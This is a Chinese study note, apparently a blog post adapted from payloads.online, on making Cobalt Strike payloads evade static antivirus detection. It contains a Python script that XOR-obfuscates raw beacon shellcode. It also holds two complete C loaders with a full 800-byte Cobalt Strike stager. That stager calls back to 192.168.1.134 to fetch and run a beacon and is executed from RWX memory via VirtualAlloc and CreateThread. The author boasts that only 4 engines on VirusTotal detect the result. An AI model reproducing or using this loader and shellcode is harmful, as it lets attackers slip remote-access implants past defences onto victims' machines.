静态恶意代码逃逸-学习一

申明:

本文非原创 学习自：
https://payloads.online/archivers/2019-11-10/1

0X01定义恶意代码

这里我们以cs载荷为例子

0X02 shellcode的定义

Shellcode是一段机器指令的集合，通常会被压缩至很小的长度，达到为后续恶意代码铺垫的作用。当然你可以通过msfvenom生成各种用于测试的shellcode。

0x03RAW文件

RAW 中文意思是原始的、未经加工的，通常使用Cobaltstrike生成的BIN文件。

RAW文件是可以直接进行字节操作读取的，因此加载到内存较为方便，通常我一般使用混淆的方式再生成一遍。

0X04C文件

 C文件给出的是一个C语言中的字符数组，也是可以通过以字节单位操作的。

 0X05组合

由于反病毒软件对于默认生成的文件查杀较为严格，我通常会采用混淆、加密解密的方式把载荷还原。

以下就是一个，用于把raw文件混淆，生成c语言数组的py代码

import sys
from argparse import ArgumentParser, FileType

def process_bin(num, src_fp, dst_fp, dst_raw):
    shellcode = ''
    shellcode_size = 0
    shellcode_raw = b''
    try:
        while True:
            code = src_fp.read(1)
            if not code:
                break

            base10 = ord(code) ^ num
            base10_str = chr(base10)
            shellcode_raw += base10_str.encode()
            code_hex = hex(base10)
            code_hex = code_hex.replace('0x','')
            if(len(code_hex) == 1):
                code_hex = '0' + code_hex
            shellcode += '\x' + code_hex
            shellcode_size += 1
        src_fp.close()
        dst_raw.write(shellcode_raw)
        dst_raw.close()
        dst_fp.write(shellcode)
        dst_fp.close()
        return shellcode_size
    except Exception as e:
        sys.stderr.writelines(str(e))

def main():
    parser = ArgumentParser(prog='Shellcode X', description='[XOR The Cobaltstrike PAYLOAD.BINs] 	 > Author: rvn0xsy@gmail.com')
    parser.add_argument('-v','--version',nargs='?')
    parser.add_argument('-s','--src',help=u'source bin file',type=FileType('rb'), required=True)
    parser.add_argument('-d','--dst',help=u'destination shellcode file',type=FileType('w+'),required=True)
    parser.add_argument('-n','--num',help=u'Confused number',type=int, default=90)
    parser.add_argument('-r','--raw',help=u'output bin file', type=FileType('wb'), required=True)
    args = parser.parse_args()
    shellcode_size = process_bin(args.num, args.src, args.dst, args.raw)
    sys.stdout.writelines("[+]Shellcode Size : {} 
".format(shellcode_size))

if __name__ == "__main__":
    main()

这里我们执行

在payload.c中会看到raw文件里的每一个字节与10的异或运算出的C语言数组。

python encode.py -s payload.bin  -d payloadbin.c -n 10 -r RAW

 静态恶意代码逃逸（第二课）

0x01 关于Windows操作系统内存

这里还是稍微展开介绍一下，Windows操作系统的内存有三种属性，分别为：可读、可写、可执行，并且操作系统将每个进程的内存都隔离开来，当进程运行时，创建一个虚拟的内存空间，系统的内存管理器将虚拟内存空间映射到物理内存上，所以每个进程的内存都是等大的。

操作系统给予每个进程申请内存的权力，使用不同的API，申请的内存具有不同的涵义。

在进程申请时，需要声明这块内存的基本信息：申请内存大小、申请内存起始内存基址、申请内存属性、申请内存对外的权限等。

申请方式：

    HeapAlloc
    malloc
    VirtualAlloc
    new
    LocalAlloc
    …

0x02 申请内存API的关系

其实以上所有的内存申请方式都与VirtualAlloc有关，因为VirtualAlloc申请的单位是“页”。而Windows操作系统管理内存的单位也是“页”。

0x03 实现一次正常加载

这里用cs的shellcode演示

#include <Windows.h>


// 入口函数
int wmain(int argc,TCHAR * argv[]){

    int shellcode_size = 0; // shellcode长度
    DWORD dwThreadId; // 线程ID
    HANDLE hThread; // 线程句柄
/* length: 800 bytes */

unsigned char buf[] = "xfcxe8x89x00x00x00x60x89xe5x31xd2x64x8bx52x30x8bx52x0cx8bx52x14x8bx72x28x0fxb7x4ax26x31xffx31xc0xacx3cx61x7cx02x2cx20xc1xcfx0dx01xc7xe2xf0x52x57x8bx52x10x8bx42x3cx01xd0x8bx40x78x85xc0x74x4ax01xd0x50x8bx48x18x8bx58x20x01xd3xe3x3cx49x8bx34x8bx01xd6x31xffx31xc0xacxc1xcfx0dx01xc7x38xe0x75xf4x03x7dxf8x3bx7dx24x75xe2x58x8bx58x24x01xd3x66x8bx0cx4bx8bx58x1cx01xd3x8bx04x8bx01xd0x89x44x24x24x5bx5bx61x59x5ax51xffxe0x58x5fx5ax8bx12xebx86x5dx68x6ex65x74x00x68x77x69x6ex69x54x68x4cx77x26x07xffxd5x31xffx57x57x57x57x57x68x3ax56x79xa7xffxd5xe9x84x00x00x00x5bx31xc9x51x51x6ax03x51x51x68x90x1fx00x00x53x50x68x57x89x9fxc6xffxd5xebx70x5bx31xd2x52x68x00x02x60x84x52x52x52x53x52x50x68xebx55x2ex3bxffxd5x89xc6x83xc3x50x31xffx57x57x6axffx53x56x68x2dx06x18x7bxffxd5x85xc0x0fx84xc3x01x00x00x31xffx85xf6x74x04x89xf9xebx09x68xaaxc5xe2x5dxffxd5x89xc1x68x45x21x5ex31xffxd5x31xffx57x6ax07x51x56x50x68xb7x57xe0x0bxffxd5xbfx00x2fx00x00x39xc7x74xb7x31xffxe9x91x01x00x00xe9xc9x01x00x00xe8x8bxffxffxffx2fx6fx34x63x56x00x68x65x6cx6cx6fx00x68x65x6cx6cx6fx00x68x65x6cx6cx6fx00x68x65x6cx6cx6fx00x68x65x6cx6cx6fx00x68x65x6cx6cx6fx00x68x65x6cx6cx6fx00x68x65x6cx6cx6fx00x68x65x6cx6cx6fx00x68x65x6cx6cx6fx00x68x65x6cx6cx6fx00x68x65x6cx6cx6fx00x68x00x55x73x65x72x2dx41x67x65x6ex74x3ax20x4dx6fx7ax69x6cx6cx61x2fx35x2ex30x20x28x63x6fx6dx70x61x74x69x62x6cx65x3bx20x4dx53x49x45x20x39x2ex30x3bx20x57x69x6ex64x6fx77x73x20x4ex54x20x36x2ex31x3bx20x57x4fx57x36x34x3bx20x54x72x69x64x65x6ex74x2fx35x2ex30x3bx20x4dx41x54x50x3bx20x4dx41x54x50x29x0dx0ax00x68x65x6cx6cx6fx00x68x65x6cx6cx6fx00x68x65x6cx6cx6fx00x68x65x6cx6cx6fx00x68x65x6cx6cx6fx00x68x65x6cx6cx6fx00x68x65x6cx6cx6fx00x68x65x6cx6cx6fx00x68x65x6cx6cx6fx00x68x65x6cx6cx6fx00x68x65x6cx6cx6fx00x68x65x6cx6cx6fx00x68x65x6cx6cx6fx00x68x65x6cx6cx6fx00x68x65x6cx6cx6fx00x68x65x6cx6cx6fx00x68x65x6cx6cx6fx00x68x65x6cx6cx6fx00x68x65x6cx6cx6fx00x68x65x6cx6cx6fx00x68x65x6cx6cx6fx00x68x65x6cx6cx6fx00x68x65x6cx6cx6fx00x68x65x6cx6cx6fx00x68x65x6cx6cx6fx00x68x65x6cx6cx6fx00x68x65x6cx6cx6fx00x68x65x6cx6cx6fx00x68x65x6cx6cx6fx00x68x65x6cx6cx6fx00x68x65x6cx6cx6fx00x68x65x6cx6cx6fx00x68x65x6cx6cx6fx00x68x65x6cx6cx6fx00x68x65x00x68xf0xb5xa2x56xffxd5x6ax40x68x00x10x00x00x68x00x00x40x00x57x68x58xa4x53xe5xffxd5x93xb9x00x00x00x00x01xd9x51x53x89xe7x57x68x00x20x00x00x53x56x68x12x96x89xe2xffxd5x85xc0x74xc6x8bx07x01xc3x85xc0x75xe5x58xc3xe8xa9xfdxffxffx31x39x32x2ex31x36x38x2ex31x2ex31x33x34x00x00x00x00x00";

// 获取shellcode大小
shellcode_size = sizeof(buf);

/*
VirtualAlloc(
    NULL, // 基址
    800,  // 大小
    MEM_COMMIT, // 内存页状态
    PAGE_EXECUTE_READWRITE // 可读可写可执行
    );
*/

char * shellcode = (char *)VirtualAlloc(
    NULL,
    shellcode_size,
    MEM_COMMIT,
    PAGE_EXECUTE_READWRITE
    );
    // 将shellcode复制到可执行的内存页中
CopyMemory(shellcode,buf,shellcode_size);

hThread = CreateThread(
    NULL, // 安全描述符
    NULL, // 栈的大小
    (LPTHREAD_START_ROUTINE)shellcode, // 函数
    NULL, // 参数
    NULL, // 线程标志
    &dwThreadId // 线程ID
    );

WaitForSingleObject(hThread,INFINITE); // 一直等待线程执行结束
    return 0;
}

运行

PS：倾旋大佬的exe但是就是16 然后现在是40几 看来很多杀软杀的不是技术 杀的是特征吧

0x04 实现一次混淆加载

使用之前的Python脚本混淆生成RAW文件，最后得到混淆后的数组：

#include <Windows.h>


// 入口函数
int wmain(int argc,TCHAR * argv[]){

    int shellcode_size = 0; // shellcode长度
    DWORD dwThreadId; // 线程ID
    HANDLE hThread; // 线程句柄
/* length: 800 bytes */

unsigned char buf[] = "xf6xe2x83x0ax0ax0ax6ax83xefx3bxd8x6ex81x58x3ax81x58x06x81x58x1ex81x78x22x05xbdx40x2cx3bxf5x3bxcaxa6x36x6bx76x08x26x2axcbxc5x07x0bxcdxe8xfax58x5dx81x58x1ax81x48x36x0bxdax81x4ax72x8fxcax7ex40x0bxdax5ax81x42x12x81x52x2ax0bxd9xe9x36x43x81x3ex81x0bxdcx3bxf5x3bxcaxa6xcbxc5x07x0bxcdx32xeax7fxfex09x77xf2x31x77x2ex7fxe8x52x81x52x2ex0bxd9x6cx81x06x41x81x52x16x0bxd9x81x0ex81x0bxdax83x4ex2ex2ex51x51x6bx53x50x5bxf5xeax52x55x50x81x18xe1x8cx57x62x64x6fx7ex0ax62x7dx63x64x63x5ex62x46x7dx2cx0dxf5xdfx3bxf5x5dx5dx5dx5dx5dx62x30x5cx73xadxf5xdfxe3x8ex0ax0ax0ax51x3bxc3x5bx5bx60x09x5bx5bx62x9ax15x0ax0ax59x5ax62x5dx83x95xccxf5xdfxe1x7ax51x3bxd8x58x62x0ax08x6ax8ex58x58x58x59x58x5ax62xe1x5fx24x31xf5xdfx83xccx89xc9x5ax3bxf5x5dx5dx60xf5x59x5cx62x27x0cx12x71xf5xdfx8fxcax05x8exc9x0bx0ax0ax3bxf5x8fxfcx7ex0ex83xf3xe1x03x62xa0xcfxe8x57xf5xdfx83xcbx62x4fx2bx54x3bxf5xdfx3bxf5x5dx60x0dx5bx5cx5ax62xbdx5dxeax01xf5xdfxb5x0ax25x0ax0ax33xcdx7exbdx3bxf5xe3x9bx0bx0ax0axe3xc3x0bx0ax0axe2x81xf5xf5xf5x25x65x44x5ax45x0ax62x6fx66x66x65x0ax62x6fx66x66x65x0ax62x6fx66x66x65x0ax62x6fx66x66x65x0ax62x6fx66x66x65x0ax62x6fx66x66x65x0ax62x6fx66x66x65x0ax62x6fx66x66x65x0ax62x6fx66x66x65x0ax62x6fx66x66x65x0ax62x6fx66x66x65x0ax62x6fx66x66x65x0ax62x0ax5fx79x6fx78x27x4bx6dx6fx64x7ex30x2ax47x65x70x63x66x66x6bx25x3fx24x3ax2ax22x69x65x67x7ax6bx7ex63x68x66x6fx31x2ax47x59x43x4fx2ax33x24x3ax31x2ax5dx63x64x6ex65x7dx79x2ax44x5ex2ax3cx24x3bx31x2ax5dx45x5dx3cx3ex31x2ax5ex78x63x6ex6fx64x7ex25x3fx24x3ax31x2ax47x4bx5ex5ax31x2ax47x4bx5ex5ax23x07x00x0ax62x6fx66x66x65x0ax62x6fx66x66x65x0ax62x6fx66x66x65x0ax62x6fx66x66x65x0ax62x6fx66x66x65x0ax62x6fx66x66x65x0ax62x6fx66x66x65x0ax62x6fx66x66x65x0ax62x6fx66x66x65x0ax62x6fx66x66x65x0ax62x6fx66x66x65x0ax62x6fx66x66x65x0ax62x6fx66x66x65x0ax62x6fx66x66x65x0ax62x6fx66x66x65x0ax62x6fx66x66x65x0ax62x6fx66x66x65x0ax62x6fx66x66x65x0ax62x6fx66x66x65x0ax62x6fx66x66x65x0ax62x6fx66x66x65x0ax62x6fx66x66x65x0ax62x6fx66x66x65x0ax62x6fx66x66x65x0ax62x6fx66x66x65x0ax62x6fx66x66x65x0ax62x6fx66x66x65x0ax62x6fx66x66x65x0ax62x6fx66x66x65x0ax62x6fx66x66x65x0ax62x6fx66x66x65x0ax62x6fx66x66x65x0ax62x6fx66x66x65x0ax62x6fx66x66x65x0ax62x6fx0ax62xfaxbfxa8x5cxf5xdfx60x4ax62x0ax1ax0ax0ax62x0ax0ax4ax0ax5dx62x52xaex59xefxf5xdfx99xb3x0ax0ax0ax0ax0bxd3x5bx59x83xedx5dx62x0ax2ax0ax0ax59x5cx62x18x9cx83xe8xf5xdfx8fxcax7exccx81x0dx0bxc9x8fxcax7fxefx52xc9xe2xa3xf7xf5xf5x3bx33x38x24x3bx3cx32x24x3bx24x3bx39x3ex0ax0ax0ax0ax0a";

// 获取shellcode大小
shellcode_size = sizeof(buf);

/* 增加异或代码 */
for(int i = 0;i<shellcode_size; i++){
    buf[i] ^= 10;
}
/*
VirtualAlloc(
    NULL, // 基址
    800,  // 大小
    MEM_COMMIT, // 内存页状态
    PAGE_EXECUTE_READWRITE // 可读可写可执行
    );
*/

char * shellcode = (char *)VirtualAlloc(
    NULL,
    shellcode_size,
    MEM_COMMIT,
    PAGE_EXECUTE_READWRITE
    );
    // 将shellcode复制到可执行的内存页中
CopyMemory(shellcode,buf,shellcode_size);

hThread = CreateThread(
    NULL, // 安全描述符
    NULL, // 栈的大小
    (LPTHREAD_START_ROUTINE)shellcode, // 函数
    NULL, // 参数
    NULL, // 线程标志
    &dwThreadId // 线程ID
    );

WaitForSingleObject(hThread,INFINITE); // 一直等待线程执行结束
    return 0;
}

上线效果

 V站查杀现在也还是只有4的查杀率

 https://www.virustotal.com/gui/file/04c0b02fdb725ea02d1da713bb784669bddc3c51ecfc391cdc86388890090361/details

PSexec: 最近很浮躁 忘了最开始接触这个的初衷是什么

愿少年接下来的日子里 潜心习安全 
日积月累